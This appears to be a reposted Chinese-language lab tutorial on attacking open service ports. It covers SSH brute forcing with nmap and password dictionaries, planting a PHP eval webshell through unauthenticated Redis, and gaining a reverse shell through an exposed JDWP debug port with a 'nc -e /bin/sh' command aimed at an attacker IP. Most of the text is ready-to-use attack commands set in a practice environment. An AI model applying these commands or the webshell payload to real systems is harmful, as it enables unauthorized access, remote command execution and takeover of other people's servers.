系統安全-基礎端口入侵實戰-暴力破解、未授權訪問、遠程命令執行


===暴力破解
===未授權訪問
===命令執行

難點:搜索平台,掃描工具在端口漏洞中的綜合利用


一、暴力破解
窮舉法的所稱
破解?uesr password

22 ssh
23 telnet
1433 mssql
1521 oracle
3306 mysql
3389 rdp

實踐
kali--->黑客
112---->受害者
nmap-->ssh/22


暴力破解ssh的前提是對方22端口開啟
1.搜集弱口令
https://github.com/k8gege/PasswordDic
2.自己生成弱口令
https://github.com/LandGrey/pydictor
3.使用nmap進行暴力破解
nmap xx.xxx.xxx.xxx/xx -p xx --script ssh-brute --script-args userdb=/xxx/xxx.txt,passdb=/xxx/xxx.txt
注意:nmap的 ssh-brupt腳本需要使用script-args傳入userdb和passdb的文件作為參數

 


二、未授權訪問 危害更大

敏感文件、敏感系統
837 reync
2181 zoomkeeper
6379 redis
8080 jboss/jenkins
9200 elasticsearch
11211 memcache (之前的UDP反射放大就是利用未授權訪問。)
27017 mangodb


2.實踐-未授權訪問redis並寫文件----(php一句話木馬)
112上安裝redis服務
同時修改/etc/redis/redis.conf
#bind 127.0.0.1 ::1
protected-mode no
擴展-redis有一個redis-tools工具用於訪問遠程數據庫
redis-cli -h xxx.xxx.xxx.xxx -p 6379

kali--安裝redis-tools
(在112准備完成后)
redis-cli -h xxx.xxx.xxx.xxx -p 6379
>info
>flushall --->清除所有數據庫
>set 1 '<?php eval($_GET["cmd"]);?>' --->可以執行任何的php函數
>config set dir /var/www/html
>config set dbfilename shell.php
>save ---->踩坑日記:目標主機的文件權限未開放導致寫入失敗

打開瀏覽器訪問112/shell.php?cmd=phpinfo();
或者cmd=system(ls);  ---->  括號中可以執行linux命令
結果:REDIS0007� redis-ver3.2.12� redis-bits�@�ctime��'a�used-mem�p� ���/var/www/html �h�cm4�"g

112--安裝服務(記得修改配置)
/var/www/html --->為站點目錄
kali的話使用apt-get安裝
修改完/etc/redis/redis.conf后
執行redis-server /etc/redis/redis.conf


三、命令執行 最大 前提獲得系統相關權限

命令:目標系統的操作命令
執行:直接輸出結果 or 間接輸出結果
445 smb
1099 rmi
8000 jdwp (實踐)
8069 zabbix
9000 fastcgi
50000 upnp

 

實踐:jdwp命令執行並反彈shell給攻擊者
利用java的一個debug服務
編寫一個死循環的測試代碼



kali-下載
  git clone https://github.com/IOActive/jdwp-shellifier
kali-監聽
  nc -lvvp
目標-部署環境
  vim Test.java
  apt-get update
  apt-get install default-jdk
  javac Test.java
  java -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=0.0.0.0:8000 Test
缺點:會在目標主機顯示執行結果

 

如何優化呢?
  利用python遠程鏈接到目標將shell反彈給攻擊者,攻擊者可執行shell命令,前提確保java的死循環在目標上正常運行
  kali:python jdwp-shellifier.py -t xxx.xxx.xxx.xxx(目標) -p 8000 --break-on java.lang.String.indexof --cmd "nc -e /bin/sh xxx.xxx.xxx.xxx(攻擊者ip) 1234"
    python jdwp-shellifier.py -t 192.168.10.112 -p 8000 --break-on java.lang.String.indexof --cmd "nc -e /bin/sh 192.168.10.123 1234"
    (該命令會在后續的代碼安全中詳細解釋)


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM